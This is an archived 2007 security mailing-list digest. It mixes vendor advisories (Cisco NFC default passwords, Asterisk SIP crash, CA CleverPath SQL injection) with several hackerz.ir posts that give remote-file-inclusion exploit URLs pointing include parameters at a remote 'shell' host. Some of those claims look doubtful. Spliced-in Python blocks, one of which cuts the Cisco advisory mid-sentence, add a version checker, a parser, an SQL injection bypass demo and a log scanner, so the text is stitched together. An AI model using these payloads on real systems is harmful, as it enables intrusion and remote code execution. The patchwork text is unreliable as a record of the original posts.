Cisco Security Advisory: Default Passwords in NetFlow Collection Engine

2007-04-25 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Default Passwords in NetFlow Collection Engine

Advisory ID: cisco-sa-20070425-nfc

http://www.cisco.com/warp/public/707/cisco-sa-20070425-nfc.shtml

Revision 1.0

For Public Release 2007 April 25 1600 UTC (GMT)


Summary
=======

Versions of Cisco Network Services (CNS) NetFlow Collection Engine (NFC)
prior to 6.0 create and use default accounts with identical usernames
and passwords. An attacker with knowledge of these accounts can modify
the application configuration and, in certain instances, gain user
access to the host operating system.

The upgrade to NFC version 6.0 is not a free upgrade. This default
password issue does not require a software upgrade and can be changed
by a configuration command for all affected customers. The workaround
detailed in this document demonstrates how to change the passwords in 5.0.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20070425-nfc.shtml.

Affected Products
=================

Vulnerable Products
+------------------

This vulnerability affects Cisco NetFlow Collection Engine running
software versions prior to 6.0.0. The software version of the Cisco
NetFlow Collection Engine can be determined by either logging into
the web-based user interface (UI) or using the show-tech parameter of
the nfcollector command from the host operating system. For customers
running version 6.0 or later, the nfcollector command uses the version
parameter to determine the software level.

Users can determine the NFC version by using a web browser to navigate
to http://nfc-hostname:8080/nfc and selecting About in the upper
left-hand corner. The browser displays the NFC version in a new window.

The NFC version can be determined from the host operating system
by using the show-tech parameter of the /opt/CSCOnfc/nfcollector
command. On systems running NFC version 5.0.3, the output from
/opt/CSCOnfc/bin/nfcollector show-tech should display a result similar
to the following:

   $ /opt/CSCOnfc/nfcollector show-tech

   ** pkginfo/swlist **
   Name        : CSCOnfc                        Relocations: /opt/CSCOnfc
   Version     : 5.0.3                          Vendor: Cisco Systems, Inc
   Release     : 2                              Build Date: Wed 06 Sep 2006 11:19:59 AM EDT
   Install Date: Mon 12 Feb 2007 04:26:54 PM EST  Build Host: nfc-hpux.cisco.com
   Group       : Applications/Network           Source RPM: CSCOnfc-5.0.3-2.src.rpm
   Size        : 109385602                      License: Copyright (c) 2002-2003 by Cisco Systems, Inc.
   Signature   : (none)
   URL         : http://www.cisco.com
   Summary     : Cisco NetFlow Collector
   Description :
   Cisco CNS NetFlow Collection Engine receives, filters, and aggregates NetFlow
   traffic data generated by Cisco routers and switches.


Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are known to be vulnerable to the issues described in
this advisory.

Details
=======

Cisco CNS NetFlow Collection Engine is used to collect and monitor
NetFlow accounting data for devices that support NetFlow, such as
routers and switches. This data can be used to provide a network
baseline, against which irregular activities like denial of service
(DoS) attacks, worms, and other malicious activity can be more easily
detected.

NFC is installed on a supported UNIX platform. The installation creates
a default web based user account, nfcuser, which is required to perform
application maintenance, configuration, and troubleshooting with a
password of nfcuser. In versions prior to 6.0, the Linux installer will
also create a local user, also nfcuser, on the operating system with a
default password also identical to the username. If the user already
exists, the Linux installer will change the password to be the same as
the username.

This issue is documented in Cisco Bug ID CSCsh75038.

Vulnerability Scoring Details
+----------------------------

Cisco is providing scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS).

Cisco will provide a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco PSIRT will set the bias in all cases to normal. Customers
are encouraged to apply the bias parameter when determining the
environmental impact of a particular vulnerability.

CVSS is a standards based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided an FAQ to answer additional questions regarding CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html .

Cisco has also provided a CVSS calculator to help compute the environmental
impact for individual
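The version check the advisory describes, as an added example that is not part of Cisco's advisory or of the NFC software: a parser for the `Version` line of `nfcollector show-tech` output that compares the parsed version numerically against 6.0.0, the first release without the default-password behaviour. The sample output embedded in the code is constructed from the excerpt above, and `check_local_install` assumes the binary path quoted in the advisory.

```python
import re
import subprocess

# Constructed sample of "nfcollector show-tech" output, modelled on the
# excerpt quoted in the advisory; only the Version line matters here.
SAMPLE_SHOW_TECH = """\
** pkginfo/swlist **
Name        : CSCOnfc                 Relocations: /opt/CSCOnfc
Version     : 5.0.3                   Vendor: Cisco Systems, Inc
Release     : 2                       Build Date: Wed 06 Sep 2006 11:19:59 AM EDT
Summary     : Cisco NetFlow Collector
"""

# First NFC release that no longer creates the default nfcuser accounts.
FIXED_IN = (6, 0, 0)

# "Version : 5.0.3" in pkginfo/rpm style; the Vendor field on the same line
# is ignored because the capture group stops at the first non-version character.
VERSION_RE = re.compile(r"^\s*Version\s*:\s*(\d+(?:\.\d+)*)", re.MULTILINE)


def parse_version(show_tech_output):
    """Return the NFC package version as a tuple of ints, or None if absent."""
    match = VERSION_RE.search(show_tech_output)
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def is_affected(version):
    """True when the version is older than 6.0.0.

    Tuples compare element-wise, so 5.10.0 sorts above 5.9.0 where a plain
    string comparison would not; short tuples such as (6,) are zero-padded.
    """
    padded = tuple(version) + (0,) * (len(FIXED_IN) - len(version))
    return padded < FIXED_IN


def check_show_tech(show_tech_output):
    """Summarise whether the host described by show-tech output is affected."""
    version = parse_version(show_tech_output)
    if version is None:
        return "unknown: no Version line found (NFC 6.0+ uses 'nfcollector version')"
    label = ".".join(str(part) for part in version)
    if is_affected(version):
        return "affected: NFC %s creates default nfcuser accounts; change the passwords" % label
    return "not affected: NFC %s" % label


def check_local_install(command="/opt/CSCOnfc/nfcollector"):
    """Run the advisory's show-tech command on this host and check its output.

    The default path is the one quoted in the advisory (an assumption for any
    other layout); a missing binary is reported, not raised, so the check can
    be dropped into an inventory script.
    """
    try:
        output = subprocess.run([command, "show-tech"], capture_output=True,
                                text=True, check=False).stdout
    except OSError as exc:
        return "unknown: could not run %s (%s)" % (command, exc)
    return check_show_tech(output)


if __name__ == "__main__":
    print(check_show_tech(SAMPLE_SHOW_TECH))
```

On an NFC 6.0 host the `show-tech` parameter is replaced by `version`, so the "unknown" branch is the cue to re-run with the newer parameter rather than a sign that the host is clean.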

MyNewsGroups RFI in include.php

2007-04-25 Thread alijsb
Author: Carlos Sánchez, [EMAIL PROTECTED]
by : www.hackerz.ir users, ali & saeid
exploit :
include.php?myng_root=http://shell


HTMLeditbox 2.2 RFI

2007-04-25 Thread alijsb
name & version: HTMLeditbox 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz, s3rv3r_hack3r, saeid_only_linux, dNetGuru
bug :
_editor.php  @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell


blogsystem 1.4 local remote = -rfi lfi -xss

2007-04-25 Thread info
demo: blog23.com
by : hackerz.ir userz !
ADMIN/index.php  include($category.'/'.$folder.'_'.$page.'.php');
ADMIN/index.php  include($category.'/'.$action.'.php');
ADMIN/login.php  include($lngTexts);
ADMIN/login.php  include($lngConfig);
BO/index.php     include($category.'/'.$folder.'_'.$page.'.php');
BO/index.php     include($category.'/'.$action.'.php');
BO/login.php     include($lngTexts);
BO/login.php     include($lngConfig);
for example, remote:
Log in to your user; after that you can use the exploit:
ADMIN/index.php  include($category.'/'.$folder.'_'.$page.'.php');

local file include & remote file include in admin panel:
BO/login.php     include($lngTexts);
BO/login.php     include($lngConfig);


WordPress v2.1.3 remote file include~

2007-04-25 Thread s433d_only_linux
by : www.hackeraz.ir userz , saeid...


# WordPress 2.1.3 Remote File Inclusion #

Affected Software: WordPress 2.1.3
Download: http://wordpress-deutschland.org
Risk: high
Date: 25/4/2007
Found by: s433d_only_linux
Contact: [EMAIL PROTECTED]
Web: Www.hackerz.ir
special thanx ... Ali Jasbi my best friend

Affected File:
wordpress/wp-settings.php
wordpress/wp-includes/template-loader.php
wordpress/wp-includes/theme.php

Exploit:
wordpress/wp-settings.php?require_once=shell?
wordpress/wp-includes/template-loader.php?include=shell?
wordpress/wp-includes/theme.php?require_once=shell?


Re: 3Com's TippingPoint Denial of Service

2007-04-25 Thread Secure
TippingPoint is committed to assuring the security of our customers, and 
we take all reports of potential security issues against our products very 
seriously. 

Even though this report seems less than credible, we would encourage the 
author of this advisory to contact us directly and provide us with 
additional details and sources to allow us to investigate this claim. 
Although there seems to be limited to no information available on how 
this apparent Denial of Service would be carried out, we've put our 
resources towards attempting to reproduce the issue, and all versions of 
our TOS have performed as expected with no DoS emerging. 

Again, if the poster of this advisory has additional information available 
that would allow us to successfully reproduce these claims, we would 
appreciate if it was submitted to us for investigation. 
Submissions can be made to [EMAIL PROTECTED] or on the web at 
www.3com.com/security.
 
Kind Regards, 
TippingPoint Security Response Team




From: [EMAIL PROTECTED]
Sent: 04/24/2007 02:24 PM
To: bugtraq@securityfocus.com
cc:
Subject: 3Com's TippingPoint Denial of Service






Vulnerability:   Denial of Service
Affected Product:3Com's TippingPoint IPS
Affected Versions:   All

Author:  Corroded_Lunchmeats_X



Issue:
==

TippingPoint IPS is prone to DoS when a sequence of crafted packets is
destined for port 80.



Details:


When quickly flooded with packets destined for port 80, and an incrementing
source port, this causes the software to consume a huge amount of CPU time,
due to a badly written loop, causing the device to stop responding.



Credits:


The Kinders Kricket Krew, Aunty_Richard, The dinosaurs who died in the
explosion.



Disclaimer:
===

This document and all the information it contains are provided as is,
for educational purposes only, without warranty of any kind, whether
express or implied.

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in
this document. Liability claims regarding damage caused by the use of
any information provided, including any kind of information which is
incomplete or incorrect, will therefore be rejected.








ASA-2007-011: Multiple problems in SIP channel parser handling response codes

2007-04-25 Thread Kevin P. Fleming
Asterisk Project Security Advisory - ASA-2007-011
 
+--------------------+---------------------------------------------------+
|      Product       | Asterisk                                          |
+--------------------+---------------------------------------------------+
|      Summary       | Multiple problems in SIP channel parser handling  |
|                    | response codes                                    |
+--------------------+---------------------------------------------------+
| Nature of Advisory | Denial of Service                                 |
+--------------------+---------------------------------------------------+
|   Susceptibility   | Remote Unauthenticated Sessions                   |
+--------------------+---------------------------------------------------+
|      Severity      | Critical                                          |
+--------------------+---------------------------------------------------+
|   Exploits Known   | No                                                |
+--------------------+---------------------------------------------------+
|    Reported On     | March 20, 2007                                    |
+--------------------+---------------------------------------------------+
|    Reported By     | Mantis user ID 'qwerty1979'                       |
+--------------------+---------------------------------------------------+
|     Posted On      | April 24, 2007                                    |
+--------------------+---------------------------------------------------+
|  Last Updated On   | April 24, 2007                                    |
+--------------------+---------------------------------------------------+
|  Advisory Contact  | [EMAIL PROTECTED]                                 |
+--------------------+---------------------------------------------------+
 
+-------------+----------------------------------------------------------+
| Description | Multiple problems have been identified in the Asterisk   |
|             | SIP channel driver (chan_sip) when handling response     |
|             | packets from other SIP endpoints.                        |
|             |                                                          |
|             | If the response packets did not contain a valid response |
|             | code in the first line of the UDP packet, the Asterisk   |
|             | SIP channel driver would fail to parse the packet        |
|             | properly and would cause the Asterisk process to die     |
|             | with a segmentation fault. This results in all active    |
|             | calls and other sessions being lost.                     |
|             |                                                          |
|             | More details about these issues can be found at          |
|             | http://bugs.digium.com/view.php?id=9313.                 |
+-------------+----------------------------------------------------------+
 
+------------+-----------------------------------------------------------+
| Resolution | All users are urged to upgrade to the appropriate version |
|            | of their Asterisk product listed in the 'Corrected In'    |
|            | section below.                                            |
+------------+-----------------------------------------------------------+
 
+------------------------------------------------------------------------+
|                           Affected Versions                            |
|                                                                        |
|          Product          |   Release   |                              |
|                           |   Series    |                              |
|---------------------------+-------------+------------------------------|
|   Asterisk Open Source    |    1.0.x    | has not been evaluated as    |
|                           |             | this release series is no    |
|                           |             | longer maintained            |
|---------------------------+-------------+------------------------------|
|   Asterisk Open Source    |    1.2.x    | all releases prior to 1.2.18 |
|---------------------------+-------------+------------------------------|
|   Asterisk Open Source    |    1.4.x    | all releases prior to 1.4.3  |
|---------------------------+-------------+------------------------------|
| Asterisk Business Edition |    A.x.x    | all releases                 |
|---------------------------+-------------+------------------------------|
| Asterisk Business Edition |    B.x.x    | all releases prior to and    |
|                           |             | including B.1.3.2            |
+---------------------------+-------------+------------------------------+
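As an added example, not code from the Asterisk project: a defensive parser for the SIP response status line the advisory describes, written in Python rather than chan_sip's C so it runs stand-alone. It validates the `SIP/2.0 <code> <reason>` shape from RFC 3261 before any field is used and discards everything else, which is the property a fix for this class of bug has to provide: a first line without a valid response code is dropped, never dereferenced. The packets are constructed samples, not captured traffic, and `pbx.example.invalid` is a placeholder host.

```python
import re

# RFC 3261 status line: "SIP/2.0" SP Status-Code SP Reason-Phrase.
# Status codes are exactly three digits with a first digit of 1-6.
STATUS_LINE_RE = re.compile(r"^SIP/2\.0 ([1-6]\d{2}) (.*)$")


class MalformedSipResponse(ValueError):
    """Raised for anything that is not a well-formed SIP response status line."""


def parse_status_line(packet):
    """Return (status_code, reason_phrase) from the first line of a SIP response.

    Every failure path raises MalformedSipResponse; no field is indexed or
    converted before the line has been shown to have the expected shape.
    """
    if not packet:
        raise MalformedSipResponse("empty packet")
    first_line = packet.split(b"\n", 1)[0].rstrip(b"\r")
    try:
        text = first_line.decode("ascii")
    except UnicodeDecodeError:
        raise MalformedSipResponse("non-ASCII bytes in status line")
    match = STATUS_LINE_RE.match(text)
    if match is None:
        raise MalformedSipResponse("not a SIP/2.0 status line: %r" % text)
    return int(match.group(1)), match.group(2)


def handle_response(packet):
    """Classify a response the way a channel driver's dispatcher would,
    discarding malformed packets before they reach code-specific handlers."""
    try:
        code, reason = parse_status_line(packet)
    except MalformedSipResponse as exc:
        return "dropped: %s" % exc
    if code < 200:
        return "provisional %d %s" % (code, reason)
    if code < 300:
        return "final-success %d %s" % (code, reason)
    if code < 400:
        return "redirect %d %s" % (code, reason)
    return "failure %d %s" % (code, reason)


# Constructed packets (not captured traffic): two valid, the rest malformed.
SAMPLES = {
    "ok": b"SIP/2.0 200 OK\r\nVia: SIP/2.0/UDP pbx.example.invalid;branch=z9hG4bK1\r\nCSeq: 1 INVITE\r\n\r\n",
    "trying": b"SIP/2.0 100 Trying\r\n\r\n",
    "empty_code": b"SIP/2.0 \r\n\r\n",
    "non_numeric": b"SIP/2.0 abc OK\r\n\r\n",
    "out_of_range": b"SIP/2.0 999 Nope\r\n\r\n",
    "request_not_response": b"INVITE sip:bob@example.invalid SIP/2.0\r\n\r\n",
    "nothing": b"",
}

if __name__ == "__main__":
    for name, packet in SAMPLES.items():
        print("%-22s %s" % (name, handle_response(packet)))
```

The Reason-Phrase may be empty under the RFC grammar, so `SIP/2.0 200 ` (trailing separator) is accepted while `SIP/2.0 200` is not; loosen the regex if interoperability with sloppy peers matters more than strictness, but keep the numeric range check either way, since that is what keeps a garbage code out of the dispatch table.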

CFP: 3rd European Conference on Computer Network Defense (EC2ND)

2007-04-25 Thread Stefano Zanero
Thanks in advance for sharing this CFP with any interested individual or
mailing list.


3rd European Conference on Computer Network Defense (EC2ND)
4-5 October 2007, FORTH-ICS, Heraklion, Crete, Greece
http://2007.ec2nd.org/

Call for Papers

The 3rd European Conference on Computer Network Defense
will take place in October 2007 at the Foundation for
Research and Technology Hellas, in Crete, Greece.

The theme of the conference is the protection of computer networks. The
conference will draw participants from academia and industry in Europe
and beyond to discuss hot topics in applied network and systems security.

EC2ND invites submissions presenting novel ideas at an early stage with
the intention to act as a discussion forum and feedback channel for
promising, innovative security research. While our goal is to solicit
ideas that are not completely worked out, and might have challenging and
interesting open questions, we expect submissions to be supported by
some evidence of feasibility or preliminary quantitative results.

Topics include but are not limited to:

* Intrusion Detection
* Denial-of-Service
* Privacy Protection
* Security Policy
* Peer-to-Peer and Grid Security
* Network Monitoring
* Web Security
* Vulnerability Management and Tracking
* Network Forensics
* Wireless and Mobile Security
* Cryptography
* Network Discovery and Mapping
* Incident Response and Management
* Malicious Software
* Web Services Security
* Legal and Ethical Issues


Submitting a Paper
You are hereby invited to submit papers up to 6-8 single-spaced pages
long. We particularly encourage position papers on preliminary work that
shows promise, rather than mature and well-polished papers studying
well-known ideas. Surprising results and thought-provoking ideas will
be strongly favored. All submissions will be reviewed by the Program
Committee. Accepted papers will be published in the electronic
proceedings of the conference. Some papers may have to go through a
shepherding process in collaboration with one of the PC members.

Important Dates

* Submissions due:
  June 24, 2007
* Notification:
  July 24, 2007
* Final version due:
  August 10, 2007

Organizers

General chair: Vasilios A. Siris (FORTH) and Panos Trimintzios (ENISA)
PC co-chairs: Sotiris Ioanidis and Kostas Anagnostakis
Local Arrangements Chair: Vasilios A. Siris
Local Arrangements Committee: Yiannis Askoksylakis and Anna Doxastaki

Program Committee
Herbert Bos, Vrije Universiteit Amsterdam, The Netherlands
Eric Cronin, University of Pennsylvania, USA
George Danezis, KU Leuven, Belgium
Austin Donnelly, Microsoft Research, UK
Stefanos Gritzalis, University of the Aegean, Greece
Mehis Hakkaja, ENISA, EU
Bjorn Knutsson, KTH, Sweden
Christopher Kruegel, TU Wien, Austria
Tieyan Li, Institute for Infocomm Research, Singapore
Javier Lopez, Universidad de Malaga, Spain
Ulrike Meyer, Nokia Siemens Networks GmbH & Co., Germany
Stefan Miltchev, Microsoft, USA
Philippe Owezarski, LAAS-CNRS, France
Michalis Polychronakis, University of Crete and FORTH-ICS, Greece
George C. Polyzos, AUEB/MMlab, Greece
Carlos Ribeiro, Universidade Tecnica de Lisboa, Portugal
Pierangela Samarati, Universita di Milano, Italy
Diomidis Spinellis, Athens University of Economics and Business, Greece
Theodore Tryfonas, University of Glamorgan, UK
Sven Ubik, CESNET, Czech Republic
Stefano Zanero, Politecnico di Milano, Italy

Steering Committee
Panagiotis Trimintzios, ENISA
Evangelos Markatos, FORTH-ICS, Greece
Andrew Blyth, University of Glamorgan, UK

-- 
Cordiali saluti,
Stefano Zanero

Politecnico di Milano - Dip. Elettronica e Informazione
Via Ponzio, 34/5 I-20133 Milano - ITALY
Tel.+39 02 2399-4010
Fax.+39 02 2399-3411
E-mail: [EMAIL PROTECTED]
Web:www.elet.polimi.it/upload/zanero


HYIP Manager Pro Script Remote file Include

2007-04-25 Thread alijsb
vendor : www.goldcoders.com
by : www.hackerz.ir userz, ali
filez :
inc/libs/Smarty.class.php
inc/libs/Smarty_Compiler.class.php
inc/libs/core/core.display_debug_console.php
inc/libs/core/core.load_plugins.php
inc/libs/core/core.load_resource_plugin.php
inc/libs/core/core.process_cached_inserts.php
inc/libs/core/core.process_compiled_include.php
inc/libs/core/core.read_cache_file.php

you can find more than this one
exploit :
http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?


VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include

2007-04-25 Thread s433d_only_linux

VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include
Download Script: http://www.virtuanews.co.uk

Affected Software: VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins
Download: http://www.virtuanews.co.uk
Risk: high
Date: 25/4/2007
Found by: s433d_only_linux
Contact: s433d_only_linux (at) yahoo (dot) de [email concealed]
Web: Www.hackerz.ir
special thanx ... Ali Jasbi my best friend

Affected File:
upload/admin.php  include($admindirectory.'/'.$key.'.php');
upload/admin.php  include($admindirectory.'/'.$val.'.php');

Exploit:
http://seit.com/upload/admin.php?include=shell?



Security Advisory: CA CleverPath SQL Injection

2007-04-25 Thread Irene Abezgauz
Background
==
The CA Clever Path Portal is a customizable portal for aggregation and
integration of data and applications. It is integrated into multiple CA
products including various Unicenter components. The CA CleverPath
utilizes a back end Database for storing data and allows usage of either
built in or external Database.

Scope
=
After identifying irregular behavior in CleverPath when modifying query
parameters in the search mechanism, Hacktics conducted research that
identified an SQL Injection vulnerability in the implementation of the
search query construction.


The Finding
===
By modifying certain parameters in the execute search URL, it was
possible to cause the application to send to the database queries that
are different from those originally intended by the search engine, and
as a result to retrieve the entire database contents according to the
application user permissions scheme in the database.

Note: Due to the diversity of possible Database implementations for
CleverPath, the actual level of possible exploitation may vary between
different systems.


Exploit Details
===
Due to the complexity of the required syntax, the identified SQL
injection does not allow for trivial exploitation such as UNION SELECT.
However, data can be still retrieved using Binary Search techniques. 

For detailed technical description and exploit please visit
http://www.hacktics.com/AdvCleverPathApr07.html


Affected Systems

Multiple CA products and 3rd party products utilizing the CleverPath
Portal. 


Solution

CA has been notified of this vulnerability on January 18th, and is
releasing a patch together with the publication of the vulnerability.


---
Irene Abezgauz
Senior Consultant & Account Manager
Hacktics Ltd.
Mobile: +972-54-6545405
Web: http://www.hacktics.com/
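The class of defect the advisory reports, as an added illustration that is neither Hacktics' exploit nor CA's code: an in-memory SQLite table (constructed data) searched once with a query built by string concatenation and once with bound parameters, so the two behaviours can be compared on the same input. `OWNER_BYPASS_TERM` is a generic tautology, not the CleverPath syntax the advisory refers to, and the table and column names are invented.

```python
import sqlite3


def build_demo_db():
    """In-memory table standing in for a portal's content store (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE portlets (id INTEGER PRIMARY KEY, title TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO portlets (title, owner) VALUES (?, ?)",
        [("Quarterly report", "alice"), ("Network map", "bob"), ("Salary review", "hr")],
    )
    return conn


def search_unsafe(conn, term, owner):
    """Query text built by concatenation: the search term is parsed as SQL,
    so quotes in it can close the literal and change the query's logic."""
    sql = ("SELECT title FROM portlets WHERE owner = '" + owner
           + "' AND title LIKE '%" + term + "%' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term, owner):
    """Same query with bound parameters: the term is only ever data, so the
    owner filter (the application's permission scheme) cannot be bypassed."""
    sql = "SELECT title FROM portlets WHERE owner = ? AND title LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (owner, "%" + term + "%"))]


# A term that closes the LIKE literal and appends an always-true clause.
# In the unsafe version it turns the owner filter into a no-op; in the safe
# version it is just an unlikely pattern that matches nothing.
OWNER_BYPASS_TERM = "%' OR '%'='"


def compare(term, owner="alice"):
    """Return both result lists for the same search term and owner."""
    conn = build_demo_db()
    try:
        return {"unsafe": search_unsafe(conn, term, owner),
                "safe": search_safe(conn, term, owner)}
    finally:
        conn.close()


if __name__ == "__main__":
    print(compare("report"))
    print(compare(OWNER_BYPASS_TERM))
```

The advisory's point that the CleverPath syntax did not allow a trivial `UNION SELECT` is a detail of one injection point; the fix is the same regardless of how awkward the injection is, because with bound parameters there is no position in the SQL text for the term to land in.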



Remote File Inclusion

2007-04-25 Thread s433d_only_linux

# b2evolution Remote File Inclusion #

Affected Software: b2evolution
Download: http://b2evolution.net/
Risk: high
Date: 25/4/2007
Found by: s433d_only_linux
Contact: [EMAIL PROTECTED]
Web: Www.hackerz.ir
special thanx ... Ali Jasbi my best friend

Affected File:
b2evolution\blogs/a_noskin.php     require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/a_stub.php       require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/admin.php        require_once $inc_path.'_main.inc.php';
b2evolution\blogs/admin.php        require $view_path.'errors/_access_denied.inc.php';
b2evolution\blogs/admin.php        require_once $inc_path.'_async.inc.php';
b2evolution\blogs/admin.php        require $control_path.$ctrl_mappings[$ctrl];
b2evolution\blogs/contact.php      require_once $inc_path.'_main.inc.php';
b2evolution\blogs/contact.php      require $skins_path.'_msgform.php';
b2evolution\blogs/default.php      require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php        require_once $inc_path.'_main.inc.php';
b2evolution\blogs/index.php        require $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php   require_once $inc_path.'_blog_main.inc.php';
b2evolution\blogs/multiblogs.php   require $skins_path.'_bloglist.php';
b2evolution\blogs/multiblogs.php   require $skins_path.'_feedback.php';

b2evolution\blogs/a_noskin.php?require=shell?
b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=
b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell?
b2evolution\blogs/admin.php?inc_path=shell


:doruk100net RFI

2007-04-25 Thread alijsb
name & version: doruk100net
vendor: Doruk100.net
download : http://rapidshare.de/files/31874580/doruk100net.rar.html
by : www.hackerz.ir userz, s3rv3r_hack3r, saeid_only_linux, farzad
exploit: http://victim/info.php?file=http://shell
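A detection-side counterpart to the remote and local file inclusion posts in this digest (MyNewsGroups, HTMLeditbox, blogsystem, HYIP Manager, VirtuaNews, b2evolution and doruk100net), added here and not taken from any of those posts: a scanner over web access-log lines that flags query parameters whose decoded value names a remote URL or PHP stream wrapper, or contains directory traversal or a NUL byte. The log lines are constructed with documentation-range addresses and placeholder paths; the `url` allowlist entry is an assumption about one hypothetical application's redirect script.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" log format; only the fields used below are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) '
)

# Parameter values that name a remote resource or a PHP stream wrapper.
REMOTE_RE = re.compile(r"^(?:https?|ftps?|php|data|expect)://", re.IGNORECASE)
# Directory traversal or an embedded NUL (used to cut off an appended suffix).
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|\x00")


def classify_value(value):
    """Return 'remote_include', 'local_traversal' or None for one decoded value."""
    if REMOTE_RE.match(value):
        return "remote_include"
    if TRAVERSAL_RE.search(value):
        return "local_traversal"
    return None


def scan_line(line, url_params_ok=frozenset()):
    """Return (ip, param, kind, value) findings for one access-log line.

    url_params_ok names parameters that legitimately carry URLs (for example
    a redirect target) and so are not reported as remote includes.
    """
    match = LOG_RE.match(line)
    if match is None:
        return []
    query = urlsplit(match.group("target")).query
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        kind = classify_value(value)
        if kind == "remote_include" and name in url_params_ok:
            continue
        if kind is not None:
            findings.append((match.group("ip"), name, kind, value))
    return findings


def scan_log(text, url_params_ok=frozenset()):
    """Scan a whole log, skipping blank lines, and return all findings in order."""
    return [finding for line in text.splitlines() if line.strip()
            for finding in scan_line(line, url_params_ok)]


# Constructed log lines (documentation-range addresses, placeholder paths);
# the query strings mirror the shape of the include parameters in the posts.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Apr/2007:10:01:02 +0000] "GET /info.php?file=about HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Apr/2007:10:01:09 +0000] "GET /info.php?file=http://198.51.100.9/x.txt? HTTP/1.1" 200 88 "-" "curl/7.15"
203.0.113.7 - - [25/Apr/2007:10:01:11 +0000] "GET /_editor.php?settings[app_dir]=http%3A%2F%2F198.51.100.9%2F HTTP/1.1" 404 0 "-" "curl/7.15"
203.0.113.9 - - [25/Apr/2007:10:02:30 +0000] "GET /index.php?page=../../../../app/config.php%00 HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Apr/2007:10:03:00 +0000] "GET /redirect.php?url=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Assumed per-application allowlist: this hypothetical redirect.php takes a URL.
URL_PARAMS_OK = frozenset({"url"})

if __name__ == "__main__":
    for ip, param, kind, value in scan_log(SAMPLE_LOG, URL_PARAMS_OK):
        print("%-12s %-16s %-18s %s" % (ip, kind, param, value))
```

Values are matched after percent-decoding, so the encoded `%3A%2F%2F` form is caught as well as the plain one. A scheme-valued parameter is not always hostile (redirect and callback targets carry URLs by design), which is why the allowlist is per application rather than global; without it the last line is reported too.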